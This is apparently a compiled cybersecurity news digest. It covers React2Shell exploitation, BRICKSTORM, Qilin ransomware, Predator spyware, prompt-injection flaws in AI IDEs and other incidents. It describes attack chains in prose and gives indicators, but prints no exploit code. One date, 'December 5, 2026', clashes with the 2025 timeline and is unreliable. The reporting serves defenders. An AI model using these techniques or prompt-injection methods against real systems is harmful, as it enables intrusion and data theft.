OpenAI, valued at $500 billion, is exploring the introduction of ads on ChatGPT to address revenue challenges. The company, which has 800 million users, relies heavily on a small percentage of paying customers for its $13 billion revenue. OpenAI is debating this move ahead of a potential public offering, as it seeks to diversify its revenue streams. OpenAI has also expanded the availability of its cheaper 'Go' subscription plan to more countries and introduced purchasable credits for Codex and Sora. OpenAI has denied reports of rolling out ads on ChatGPT paid plans, clarifying that the recommendations are app suggestions from pilot partners. The company aims to make app suggestions appear more organic within ChatGPT.

Portugal has amended its cybercrime law to provide legal protection for good-faith security research. The new provisions in Article 8.o-A, titled "Acts not punishable due to public interest in cybersecurity," exempt security researchers from criminal liability under strict conditions. These conditions include the purpose of identifying vulnerabilities, not seeking economic benefit beyond professional compensation, immediate reporting, and adhering to ethical research practices. The law also specifies prohibited techniques and data handling requirements. This update aligns Portugal with similar legal frameworks in Germany and the U.S., recognizing the importance of security research in improving cybersecurity.

A critical security vulnerability (CVE-2025-55182, CVSS 10.0) in React Server Components (RSC) allows unauthenticated remote code execution due to unsafe deserialization of payloads. The flaw affects multiple versions of React and Next.js, potentially impacting any application using RSC. The issue has been patched, but 39% of cloud environments remain vulnerable. Cloudflare experienced a widespread outage due to an emergency patch for this vulnerability, and multiple China-linked hacking groups have begun exploiting it. NHS England National CSOC has warned of the likelihood of continued exploitation in the wild. Major companies such as Google Cloud, AWS, and Cloudflare immediately responded to the vulnerability. The security researcher Lachlan Davidson disclosed the vulnerability on November 29, 2025, to the Meta team. The flaw has been dubbed React2Shell, a nod to the Log4Shell vulnerability discovered in 2021. The US National Vulnerability Database (NVD) rejected CVE-2025-66478 as a duplicate of CVE-2025-55182. Exploitation success rate is reported to be nearly 100% in default configurations. React servers that use React Server Function endpoints are known to be vulnerable. The Next.js web application is also vulnerable in its default configuration. At the time of writing, it is unknown if active exploitation has occurred, but there have been some reports of observed exploitation activity as of December 5, 2026. OX Security warned that the flaw is now actively exploitable on December 5, around 10am GMT. Hacker maple3142 published a working PoC, and OX Security successfully verified it. JFrog identified fake proof-of-concepts (PoC) on GitHub, warning security teams to verify sources before testing. Cloudflare started investigating issues on December 5 at 08:56 UTC, and a fix was rolled out within half an hour, but by that time outages had been reported by several major internet services, including Zoom, LinkedIn, Coinbase, DoorDash, and Canva. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on December 6, 2025, following confirmed active exploitation. The vulnerability is tracked as React2Shell and is related to a remote code execution flaw in React Server Components (RSC). The flaw is due to insecure deserialization in the Flight protocol used by React to communicate between a server and client. The vulnerability affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Patched versions of React are 19.0.1, 19.1.2, and 19.2.1. Downstream frameworks impacted include Next.js, React Router, Waku, Parcel, Vite, and RedwoodSDK. Amazon reported attack attempts from Chinese hacking groups like Earth Lamia and Jackpot Panda within hours of public disclosure. Coalition, Fastly, GreyNoise, VulnCheck, and Wiz reported seeing exploitation efforts targeting the flaw. Some attacks involved the deployment of cryptocurrency miners and the execution of "cheap math" PowerShell commands. Censys identified about 2.15 million instances of internet-facing services potentially affected by the vulnerability. Palo Alto Networks Unit 42 confirmed over 30 affected organizations across numerous sectors, with activity consistent with Chinese hacking group UNC5174. Security researcher Lachlan Davidson released multiple proof-of-concept (PoC) exploits for the vulnerability. Another working PoC was published by a Taiwanese researcher with the GitHub handle maple3142. Federal Civilian Executive Branch (FCEB) agencies have until December 26, 2025, to apply the necessary updates to secure their networks. Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182). Researchers have confirmed that attackers have already compromised over 30 organizations across multiple sectors using the React2Shell flaw. Shadowserver detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States. GreyNoise recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. Attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw. Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory. One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads. The PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network. Amazon AWS threat intelligence teams saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda. Palo Alto Networks observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security. The deployed malware in these attacks includes Snowlight and Vshell, both commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network.

Over 30 vulnerabilities, collectively named IDEsaster, have been disclosed in various AI-powered Integrated Development Environments (IDEs). These flaws allow data exfiltration and remote code execution by chaining prompt injection primitives with legitimate IDE features. The affected IDEs include Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline. The vulnerabilities exploit the interaction between AI agents and IDE features, leading to significant security risks for developers and enterprises using these tools.

A significant increase in scanning activity targeting Palo Alto Networks login portals was observed on October 3, 2025. The activity involved 1,300 unique IP addresses, with 91% classified as suspicious and 7% as malicious. The scans were geolocated primarily in the U.S., with smaller clusters in the U.K., the Netherlands, Canada, and Russia. The scans were directed at Palo Alto GlobalProtect and PAN-OS profiles, indicating targeted reconnaissance efforts. This surge shares characteristics with recent scanning activity targeting Cisco ASA devices, which was followed by the disclosure of zero-day vulnerabilities. The scans are likely part of a broader pattern of increased malicious activity targeting network security appliances. Palo Alto Networks customers are advised to ensure they are running the latest software versions. Additionally, an increase in exploitation attempts of an old path traversal vulnerability in Grafana was observed, with 110 unique malicious IPs, most from Bangladesh, launching attacks on September 28, 2025. GreyNoise will continue monitoring the activity in case it precedes a new Palo Alto vulnerability disclosure. Security products remain a popular target for threat actors, with recent increases in attacks from the Akira ransomware group aimed at SonicWall SSL VPN appliances. AI is being used by cyber-threat actors to enhance existing tactics, techniques, and procedures (TTPs) in victim reconnaissance, vulnerability research, and exploit development. Malicious scanning activity targeting Palo Alto Networks GlobalProtect VPN login portals increased 40 times in 24 hours, indicating a coordinated campaign. Activity began climbing on November 14 and hit its highest level in 90 days within a week. GreyNoise identified a significant escalation in malicious activity targeting Palo Alto Networks GlobalProtect portals. The primary ASN used in these attacks is identified as AS200373 (3xK Tech GmbH), with 62% of the IPs being geolocated to Germany, and 15% to Canada. A second ASN involved in this activity is AS208885 (Noyobzoda Faridduni Saidilhom). Between November 14 and 19, GreyNoise observed 2.3 million sessions hitting the */global-protect/login.esp URI on Palo Alto PAN-OS and GlobalProtect. The URI corresponds to a web endpoint exposed by a Palo Alto Networks firewall running GlobalProtect and shows a page where VPN users can authenticate. Login attempts are mainly aimed at the United States, Mexico, and Pakistan, with similar volumes across all of them. GreyNoise has previously underlined the importance of blocking these attempts and actively tracking them as malicious probes, instead of disregarding them as failed exploit attempts targeting long-patched flaws. As the company's stats show, these scanning spikes typically precede the disclosure of new security flaws in 80% of cases, with the correlation being even stronger for Palo Alto Networks' products. Concerning malicious activity for Palo Alto Networks this year, there have been two cases of active exploitation of flaws in February, with CVE-2025-0108, which was later chained with CVE-2025-0111 and CVE-2024-9474. A new wave of VPN login attempts targeting Palo Alto GlobalProtect portals was observed starting on December 2, 2025. The activity originated from more than 7,000 IP addresses from infrastructure operated by the German IT company 3xK GmbH (AS200373). The actor initially targeted GlobalProtect portals with brute-force and login attempts, then pivoted to scanning SonicWall API endpoints. GreyNoise attributes both activities to the same actor based on the analyzed indicators. On December 3, the same three fingerprints were seen in scanning activity targeting SonicWall SonicOS API. Palo Alto Networks confirmed that the increased scanning aimed at GlobalProtect interfaces represents credential-based attacks, not an exploit of a software vulnerability. Palo Alto Networks recommends customers enforce Multi-Factor Authentication (MFA) to protect against credential abuse.

A sprawling academic cheating network, generating nearly $25 million in revenue, has been linked to a Kremlin-connected oligarch and Russia’s largest private university, Synergy. The network, operating under brands like Nerdify and Geekly Hub, uses Google Ads to promote its services, despite Google’s policies prohibiting such ads. The operation has ties to Synergy University, which is involved in developing combat drones for Russia’s war against Ukraine. The essay mill network has been rebranded multiple times, with new entities and front-persons, primarily young Ukrainian women, to evade Google’s ad restrictions. The network’s operations are linked to individuals with connections to Russian propaganda efforts and the Kremlin.

The FBI has issued a warning about virtual kidnapping scams where criminals use altered social media photos as fake proof of life to extort ransom payments. These scams involve contacting victims via text message, claiming to have kidnapped a family member and demanding immediate payment. The criminals use manipulated images and publicly available information to create convincing but false scenarios. The FBI advises caution and recommends establishing a family code word and verifying communications before paying any ransom.

A critical XML External Entity (XXE) injection vulnerability (CVE-2025-66516) has been disclosed in Apache Tika, affecting multiple modules. The flaw, rated 10.0 on the CVSS scale, allows attackers to execute XXE attacks via crafted XFA files in PDFs. The vulnerability affects specific versions of tika-core, tika-pdf-module, and tika-parsers. Users are advised to upgrade to the patched versions immediately. The vulnerability is similar to CVE-2025-54988 but expands the scope of affected packages and highlights the importance of upgrading both the tika-parser-pdf-module and tika-core to mitigate the risk.

Modern security teams face challenges with traditional passive internet-scan data, which quickly becomes outdated due to dynamic cloud environments and rapid deployment cycles. Continuous, automated, active reconnaissance is essential for maintaining an accurate view of the external attack surface. This approach helps detect newly exposed services, misconfigurations, and shadow IT, reducing alert fatigue and improving decision-making.

The European Commission fined X €120 million ($140 million) for violating the Digital Services Act (DSA) due to deceptive blue checkmarks, opaque advertising practices, and blocking researchers' access to public data. The fine follows a two-year investigation into X's compliance with DSA obligations regarding harmful content and information manipulation. The commission found that X's blue checkmark system misleads users by allowing purchases without meaningful identity verification, increasing exposure to fraud and manipulation. Additionally, X failed to maintain a transparent advertising repository and imposed barriers on researchers accessing public data. X has 60 days to address the blue checkmark issue and 90 days to submit action plans for the other violations, with potential periodic penalties for non-compliance.

The BRICKSTORM malware, attributed to PRC state-sponsored actors, has been used for long-term espionage against U.S. organizations, particularly in the technology, legal, SaaS, and BPO sectors. The malware, a Go-based backdoor, has been active for over a year, with an average dwell time of 393 days. It targets appliances without EDR support, such as VMware vCenter/ESXi, and uses legitimate traffic to mask its C2 communications. The attackers aim to exfiltrate emails and maintain stealth through various tactics, including removing the malware post-operation to hinder forensic investigations. The malware serves multiple functions, including web server, file manipulation, dropper, SOCKS relay, and shell command execution. The attackers use a malicious Java Servlet Filter (BRICKSTEAL) on vCenter to capture credentials and clone Windows Server VMs to extract secrets. The stolen credentials are used for lateral movement and persistence, including enabling SSH on ESXi and modifying startup scripts. The malware exfiltrates emails via Microsoft Entra ID Enterprise Apps, utilizing its SOCKS proxy to tunnel into internal systems and code repositories. UNC5221 focuses on developers, administrators, and individuals tied to China's economic and security interests. Mandiant has released a free scanner script to help defenders detect BRICKSTORM. CISA, NSA, and Cyber Centre issued a joint report on BRICKSTORM, providing IOCs, detection signatures, and recommended mitigations. The report highlights BRICKSTORM's advanced functionality to conceal communications, move laterally, and tunnel into victim networks. The malware automatically reinstalls or restarts if disrupted, and PRC actors are primarily targeting government and IT sector organizations. CISA analyzed eight BRICKSTORM samples from victim organizations and urges organizations to contact CISA if they detect BRICKSTORM or related activity. CISA warns that Chinese hackers have been backdooring VMware vSphere servers with Brickstorm malware, using multiple layers of encryption and a self-monitoring function to maintain persistence. The attackers compromised a web server in an organization's DMZ in April 2024, moved laterally to an internal VMware vCenter server, and deployed malware. They also hacked two domain controllers and exported cryptographic keys after compromising an ADFS server, maintaining access from at least April 2024 through September 2025. The attackers captured Active Directory database information and performed system backups to steal legitimate credentials and other sensitive data. CrowdStrike linked these attacks to a Chinese hacking group it tracks as Warp Panda, which also deployed previously unknown Junction and GuestConduit malware implants in VMware ESXi environments. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday released details of a backdoor named BRICKSTORM that has been put to use by state-sponsored threat actors from the People's Republic of China (PRC) to maintain long-term persistence on compromised systems. BRICKSTORM is a sophisticated backdoor for VMware vSphere and Windows environments, enabling cyber threat actors to maintain stealthy access and providing capabilities for initiation, persistence, and secure command-and-control. Written in Golang, the custom implant gives bad actors interactive shell access on the system and allows them to browse, upload, download, create, delete, and manipulate files. The malware, mainly used in attacks targeting governments and information technology (IT) sectors, also supports multiple protocols, such as HTTPS, WebSockets, and nested Transport Layer Security (TLS), for command-and-control (C2), DNS-over-HTTPS (DoH) to conceal communications and blend in with normal traffic, and can act as a SOCKS proxy to facilitate lateral movement. The cybersecurity agency did not disclose how many government agencies have been impacted or what type of data was stolen. The activity represents an ongoing tactical evolution of Chinese hacking groups, which have continued to strike edge network devices to breach networks and cloud infrastructures. In a statement shared with Reuters, a spokesperson for the Chinese embassy in Washington rejected the accusations, stating the Chinese government does not "encourage, support or connive at cyber attacks.". BRICKSTORM was first documented by Google Mandiant in 2024 in attacks linked to the zero-day exploitation of Ivanti Connect Secure zero-day vulnerabilities (CVE-2023-46805 and CVE-2024-21887). The use of the malware has been attributed to two clusters tracked as UNC5221 and a new China-nexus adversary tracked by CrowdStrike as Warp Panda. Earlier this September, Mandiant and Google Threat Intelligence Group (GTIG) said they observed legal services, software-as-a-service (SaaS) providers, Business Process Outsourcers (BPOs), and technology sectors in the U.S. being targeted by UNC5221 and other closely related threat activity clusters to deliver the malware. A key feature of the malware, per CISA, is its ability to automatically reinstall or restart itself by means of a self-monitoring function that allows its continued operation in the face of any potential disruption. In one case detected in April 2024, the threat actors are said to have accessed a web server inside an organization's demilitarized zone (DMZ) using a web shell, before moving laterally to an internal VMware vCenter server and implanting BRICKSTORM. However, many details remain unknown, including the initial access vector used in the attack and when the web shell was deployed. The attackers have also been found to leverage the access to obtain service account credentials and laterally move to a domain controller in the DMZ using Remote Desktop Protocol (RDP) so as to capture Active Directory information. Over the course of the intrusion, the threat actors managed to get the credentials for a managed service provider (MSP) account, which was then used to jump from the internal domain controller to the VMware vCenter server. CISA said the actors also moved laterally from the web server using Server Message Block (SMB) to two jump servers and an Active Directory Federation Services (ADFS) server, exfiltrating cryptographic keys from the latter. The access to vCenter ultimately enabled the adversary to deploy BRICKSTORM after elevating their privileges. CrowdStrike, in its analysis of Warp Panda, said it has detected multiple intrusions targeting VMware vCenter environments at U.S.-based legal, technology, and manufacturing entities this year that have led to the deployment of BRICKSTORM. The group is believed to have been active since at least 2022. Warp Panda exhibits a high level of technical sophistication, advanced operations security (OPSEC) skills, and extensive knowledge of cloud and virtual machine (VM) environments. Warp Panda demonstrates a high level of stealth and almost certainly focuses on maintaining persistent, long-term, covert access to compromised networks. Evidence shows the hacking group gained initial access to one entity in late 2023. Also deployed in the attacks alongside BRICKSTORM are two previously undocumented Golang implants, namely Junction and GuestConduit, on ESXi hosts and guest VMs, respectively. Junction acts as an HTTP server to listen for incoming requests and supports a wide range of capabilities to execute commands, proxy network traffic, and interact with guest VMs through VM sockets (VSOCK). GuestConduit, on the other hand, is a network traffic-tunneling implant that resides within a guest VM and establishes a VSOCK listener on port 5555. Its primary responsibility is to facilitate communication between guest VMs and hypervisors. Initial access methods involve the exploitation of internet-facing edge devices to pivot to vCenter environments, either using valid credentials or abusing vCenter vulnerabilities. Lateral movement is achieved by using SSH and the privileged vCenter management account "vpxuser." The hacking crew has also used the Secure File Transfer Protocol (SFTP) to move data between hosts. Some of the exploited vulnerabilities are listed below - CVE-2024-21887 (Ivanti Connect Secure), CVE-2023-46805 (Ivanti Connect Secure), CVE-2024-38812 (VMware vCenter), CVE-2023-34048 (VMware vCenter), CVE-2021-22005 (VMware vCenter), CVE-2023-46747 (F5 BIG-IP). The entire modus operandi revolves around maintaining stealth by clearing logs, timestomping files, and creating rogue VMs that are shut down after use. BRICKSTORM, masquerading as benign vCenter processes, is employed to tunnel traffic through vCenter servers, ESXi hosts, and guest VMs. Similar to details shared by CISA, CrowdStrike noted that the attackers used their access to vCenter servers to clone domain controller VMs, possibly in a bid to harvest the Active Directory Domain Services database. The threat actors have also been spotted accessing the email accounts of employees who work in areas that align with Chinese government interests. Warp Panda likely used their access to one of the compromised networks to engage in rudimentary reconnaissance against an Asia Pacific government entity. They also connected to various cybersecurity blogs and a Mandarin-language GitHub repository. Another significant aspect of Warp Panda's activities is their focus on establishing persistence in cloud environments and accessing sensitive data. Characterizing it as a "cloud-conscious adversary," CrowdStrike said the attackers exploited their access to entities' Microsoft Azure environments to access data stored in OneDrive, SharePoint, and Exchange. In at least one incident, the hackers managed to get hold of user session tokens, likely by exfiltrating user browser files and tunneled traffic through BRICKSTORM implants to access Microsoft 365 services via a session replay attack and download SharePoint files related to the organization's network engineering and incident response teams. The attackers have also engaged in additional ways to set up persistence, such as by registering a new multi-factor authentication (MFA) device through an Authenticator app code after initially logging into a user account. In another intrusion, the Microsoft Graph API was used to enumerate service principals, applications, users, directory roles, and emails. The adversary primarily targets entities in North America and consistently maintains persistent, covert access to compromised networks, likely to support intelligence-collection efforts aligned with PRC strategic interests.

Two China-linked hacking groups, Earth Lamia and Jackpot Panda, have begun exploiting the newly disclosed React2Shell vulnerability (CVE-2025-55182) in React Server Components, which allows unauthenticated remote code execution. The vulnerability was addressed in React versions 19.0.1, 19.1.2, and 19.2.1. The groups have targeted various sectors, including financial services, logistics, retail, IT, universities, and government organizations across Latin America, the Middle East, and Southeast Asia. The attacks involve running discovery commands, writing files, and reading sensitive information, demonstrating a systematic approach to exploit multiple vulnerabilities simultaneously.

The Qilin ransomware group has been active, targeting multiple organizations, including Inotiv, a U.S.-based pharmaceutical company, Creative Box Inc. (CBI), a subsidiary of Nissan, Mecklenburg County Public Schools (MCPS), Asahi Group, and Synnovis, a UK pathology services provider. The latest attack was on South Korean financial sector, where Qilin claims to have stolen over 1 million files and 2 TB of data from 28 victims. The attack caused significant operational disruption, including a beer shortage in Japan. The group has also targeted other Japanese companies, including Shinko Plastics and Osaki Medical. The Qilin ransomware group operates as a ransomware-as-a-service (RaaS) network, providing tools and infrastructure to affiliates and taking a 15–20% share of ransom payments. The group's malware is custom-built in Rust and C for cross-platform attacks, including Windows, Linux, and ESXi systems. The Qilin ransomware operation was first launched as "Agenda" in August 2022 and rebranded to Qilin by September 2022. Qilin ransomware operation has attacked more than 700 victims across 62 countries in 2025. The Qilin ransomware operation has published over 40 new victims per month in the second half of 2025. The Qilin ransomware operation uses the Windows Subsystem for Linux (WSL) to execute Linux encryptors on Windows systems, evading traditional security tools. Qilin ransomware group has been observed exploiting unpatched VPN appliances and lack of multi-factor authentication (MFA) to gain initial access to corporate networks. Qilin ransomware group has been observed targeting small-to-medium-sized businesses in the construction, healthcare, and financial sectors. Qilin ransomware group has been observed using new extortion channels, including Telegram and public sites such as WikiLeaksV2. Qilin ransomware group has been observed collaborating with affiliates of the Scattered Spider group. Qilin ransomware group has been observed operating as a ransomware-as-a-service (RaaS) group since 2023, leasing its tools and infrastructure to affiliates. Qilin ransomware group has been observed publishing victims' data on dark-web leak sites if no ransom is paid. Asahi Group Holdings confirmed that the personal data of approximately 1.914 million individuals, including 1.525 million customers, was or may have been exposed in the cyber-attack. The exposed data includes names, genders, dates of birth, postal addresses, email addresses, and phone numbers. Asahi Group Holdings spent two months investigating the breach, conducting root cause analysis, integrity checks, containing the ransomware, restoring systems, and strengthening security. Atsushi Katsuki, President and Group CEO of Asahi Group Holdings, publicly apologized for the difficulties caused by the disruptions. Asahi Group Holdings is reviewing the potential impact of the incident on its financial results for fiscal year 2025. The Qilin ransomware group claimed responsibility for the cyber-attack on Asahi Group Holdings. Asahi Group Holdings temporarily suspended its operations in Japan in late September following a system failure due to the ransomware attack. The disruptions included order and shipment operations, call centers, and customer service desks. Asahi Group Holdings postponed the launch of a new product scheduled to be released in October due to the cyber-attack. On October 7, the Qilin ransomware group listed Asahi on its data leak site, claiming to have stolen 27 GB of files from the company. Inotiv is notifying 9,542 individuals that their personal information was stolen in the August 2025 ransomware attack. Inotiv has restored availability and access to impacted networks and systems affected by the August 2025 ransomware attack. The Qilin ransomware group claimed responsibility for the breach in August 2025, leaked data samples, and said they exfiltrated over 162,000 files totaling 176 GB from Inotiv.

The Louvre is investing €57m to renovate its security infrastructure following the theft of the Crown Jewels in October. The tender includes plans for a new digital safety management system, IT and physical security monitoring software, CCTV upgrades, access control mechanisms, and intrusion detection systems. The project aims to enhance cybersecurity and physical security while ensuring interoperability and scalability. The Louvre has set a deadline of December 10 for companies to apply and show interest in providing solutions. The modernization works will be carried out without suspending museum activities.

Predator spyware, developed by Intellexa, has been using a zero-click infection mechanism called Aladdin, which infects targets by displaying malicious advertisements. This vector is hidden behind shell companies across multiple countries and leverages the commercial mobile advertising system to deliver malware. The spyware is still operational and actively developed, with additional delivery vectors like Triton targeting Samsung Exynos devices. The infection occurs when a target views a malicious ad, which triggers a redirection to Intellexa’s exploit delivery servers. The ads are served through a complex network of advertising firms, making defense measures challenging. Despite sanctions and investigations, including fines from the Greek Data Protection Authority, Intellexa remains active and prolific in zero-day exploitation. Recent leaks reveal that Intellexa's Predator spyware has been marketed under various names, including Helios, Nova, Green Arrow, and Red Arrow. The spyware exploits multiple zero-day vulnerabilities in Android and iOS devices, and uses frameworks like JSKit for native code execution. Intellexa also has the capability to remotely access the surveillance systems of its customers using TeamViewer. The spyware collects extensive data from targeted devices, including messaging apps, calls, emails, device locations, screenshots, passwords, and other on-device information.

Managed Service Providers (MSPs) are shifting their sales strategies to focus on building trust and understanding client needs, rather than traditional sales tactics. The 'Getting to Yes': An Anti-Sales Guide for MSPs outlines a trust-first framework to help MSPs overcome common objections and foster long-term partnerships. This approach emphasizes empathy, education, and evidence to demonstrate the business value of cybersecurity services.

Multiple China-linked threat actors, including Earth Lamia and Jackpot Panda, have begun exploiting the critical React2Shell vulnerability (CVE-2025-55182) in React and Next.js. This insecure deserialization flaw allows unauthenticated remote execution of JavaScript code in the server's context. The vulnerability affects multiple versions of the widely used libraries, potentially exposing thousands of dependent projects. AWS reports active exploitation attempts within hours of the public disclosure, with attackers using a mix of public exploits and manual testing to refine their techniques.

Cloudflare experienced a service disruption on December 5, 2025, leading to widespread 500 Internal Server Errors across websites relying on its infrastructure. The issue affected users attempting to access various sites, displaying server-side errors instead of the expected content. The disruption highlights the critical role of Cloudflare in maintaining the availability and security of numerous online services.

Threat actors are exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users. The flaw, which affects ArrayOS AG 9.4.5.8 and earlier versions, was patched in May but lacks a CVE identifier. Attacks have been observed since at least August, targeting organizations in Japan. The vulnerability is linked to the 'DesktopDirect' remote access feature, and workarounds are available for those unable to update. The attacks have originated from the IP address 194.233.100[.]138. An authentication bypass flaw in the same product (CVE-2023-28461, 9.8) was exploited last year by a China-linked cyber espionage group dubbed MirrorFace, which has a history of targeting Japanese organizations since at least 2019.

China-based phishing groups have expanded their operations to include fake e-commerce websites and SMS lures promising unclaimed tax refunds and mobile rewards points. These groups, previously known for non-stop scam SMS messages about packages or unpaid toll fees, are now using phishing kits to create convincing fake e-commerce sites that convert customer payment card data into mobile wallets from Apple and Google. The phishing domains are promoted via SMS messages sent through Apple’s iMessage or Google’s RCS messaging service. The phishing websites ask for the visitor’s name, address, phone number, and payment card data to claim the points. If card data is submitted, the site prompts the user to share a one-time code sent via SMS by their financial institution. This code is used to enroll the victim’s phished card details in a mobile wallet controlled by the fraudsters. Experts note that these phishing kits have been used in other geographies like the EU and Asia but are now targeting consumers in the United States.

The UK's National Cyber Security Center (NCSC) has introduced a pilot service called Proactive Notifications to alert organizations about vulnerabilities in their exposed devices. The service identifies unpatched vulnerabilities and weak security configurations using public data and internet scans, then recommends specific software updates or security improvements. The pilot program targets UK domains and IP addresses, but it is not exhaustive and should not replace other security alerts. Organizations are encouraged to also use the NCSC's Early Warning service for real-time threat notifications.

Russia has blocked access to Apple's FaceTime and Snapchat, citing their use in coordinating terrorist attacks, recruiting criminals, and committing fraud. Roskomnadzor, the Russian telecommunications watchdog, announced the blocking of these platforms, stating they are being used to organize terrorist activities and other crimes against Russian citizens. Snapchat was blocked on October 10, while FaceTime's blocking was announced on December 4. Additionally, Russia has previously banned other platforms like Viber and Signal for similar reasons.

The threat actor Silver Fox has been exploiting a previously unknown vulnerable driver associated with WatchDog Anti-malware to deploy ValleyRAT malware. The driver, 'amsdk.sys' (version 1.0.600), is a validly signed Windows kernel device driver built on the Zemana Anti-Malware SDK. This driver allows arbitrary process termination and local privilege escalation, enabling the attackers to neutralize endpoint protection products and deploy the ValleyRAT remote access trojan. The campaign, first observed in late May 2025, targets Chinese-speaking victims using various social engineering techniques and trojanized software. The WatchDog driver has been patched, but attackers have adapted by modifying the driver to bypass hash-based blocklists. Silver Fox, also known as SwimSnake and UTG-Q-1000, is highly active and organized, targeting domestic users and companies to steal secrets and defraud victims. Recently, Silver Fox has been spotted orchestrating a false flag operation to mimic a Russian threat group in attacks targeting organizations in China. The campaign leverages Microsoft Teams lures to trick users into downloading a malicious setup file that leads to the deployment of ValleyRAT (Winos 4.0). The activity has been underway since November 2025. The malicious setup file is a ZIP archive named "MSTчamsSetup.zip" retrieved from an Alibaba Cloud URL. The malware scans running processes for binaries related to 360 Total Security, configures Microsoft Defender Antivirus exclusions, and writes a trojanized version of the Microsoft installer to the "AppData\Local\" path. The malware writes additional files including "AppData\Local\Profiler.json," "AppData\Roaming\Embarcadero\GPUCache2.xml," "AppData\Roaming\Embarcadero\GPUCache.xml," and "AppData\Roaming\Embarcadero\AutoRecoverDat.dll." The malware loads data from "Profiler.json" and "GPUcache.xml," and launches the malicious DLL into the memory of "rundll32.exe." The malware establishes a connection to an external server to fetch the final payload to facilitate remote control. Silver Fox's objectives include financial gain through theft, scams, and fraud, alongside the collection of sensitive intelligence for geopolitical advantage. The disclosure comes as Nextron Systems highlighted another ValleyRAT attack chain that uses a trojanized Telegram installer as the starting point to kick off a multi-stage process that ultimately delivers the trojan.

Two former federal contractors, Muneeb and Sohaib Akhter, have been charged with conspiring to steal sensitive information and destroy government databases after being fired. The brothers allegedly deleted 96 databases containing U.S. government information, including Freedom of Information Act records and sensitive investigative documents. They also attempted to cover their tracks by wiping system logs and company laptops.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), along with international partners, have released a joint guide outlining principles for securely integrating Artificial Intelligence (AI) into Operational Technology (OT) environments. The guide provides four key principles to help critical infrastructure owners and operators mitigate risks and ensure the safe adoption of AI in OT systems. The guide emphasizes the need for understanding AI risks, assessing its use in OT, establishing governance frameworks, and embedding safety and security measures. It focuses on machine learning (ML)- and large language model (LLM)-based AI, but can also be applied to systems using traditional statistical modeling and logic-based automation. The guide provides examples of AI use cases in OT environments, including field devices, PLCs, RTUs, SCADA, DCS, and HMI systems, and highlights the risks associated with AI integration, such as system compromise, disruptions, financial loss, and functional safety impact. Additionally, the guidance emphasizes protecting sensitive OT data, including engineering configuration information and ephemeral data, and addresses the challenges of integrating AI into legacy OT systems.

Operational Technology (OT) systems, which control critical infrastructure such as energy plants and manufacturing facilities, face unique cybersecurity challenges due to their direct interaction with physical systems. These challenges include outdated hardware, shared accounts, remote access vulnerabilities, and the increasing intermingling of IT and OT systems. Strong password policies are essential to mitigate these risks, as weak passwords can lead to severe consequences, including physical dangers and operational disruptions.

The UK’s National Cyber Security Centre (NCSC) and Canada’s Centre for Cyber Security (CCCS) have released a report on digital content provenance to combat the spread of misleading information in the era of generative AI. The report emphasizes the need for organizations to improve the public provenance of their information to build trust. It explores the emerging field of content provenance technologies and offers strategies to manage associated risks. The report also highlights the challenges in developing and implementing these technologies, including the burden placed on end users to understand provenance data.

A new phishing framework named GhostFrame has been linked to over one million attacks. Built around a stealthy iframe architecture, GhostFrame conceals malicious behavior within embedded iframes, allowing attackers to evade detection and dynamically adjust phishing content. The framework employs anti-analysis controls and randomized subdomains to maintain stealth and ensure attack continuity. GhostFrame's attack chain involves a benign-looking outer page that loads a secondary phishing page within an iframe, which contains the actual credential-harvesting components. The framework's emails vary widely in themes, including fake contract notices, HR updates, and password reset requests.

Microsoft is addressing a bug preventing installation of Microsoft 365 desktop apps on Windows devices. The issue stems from misconfigured authentication components in versions 2508 (Build 19127.20358) and 2507 (Build 19029.20294). The bug has been impacting users since November 2nd, causing Office Client issues. Microsoft has developed and is testing a fix, with an update on progress expected by 6:30 PM UTC today. The incident, tagged as OP1192004, is considered critical with noticeable user impact. Additionally, Microsoft is resolving a separate issue (MO1176905) affecting access to multiple Microsoft 365 services for some admins and users.

The Cybersecurity and Infrastructure Security Agency (CISA) has launched the Industry Engagement Platform (IEP) to facilitate structured, two-way communication between the agency and companies developing innovative and security technologies. The platform aims to improve understanding of emerging solutions across the technology ecosystem and provide a transparent pathway for industry engagement. The IEP allows organizations to request conversations with CISA subject matter experts to present new technologies and capabilities that could strengthen national cyber and infrastructure security. Participation in the IEP does not provide preferential consideration for future federal contracts but serves as a key channel for CISA to gain insight into new capabilities and market trends.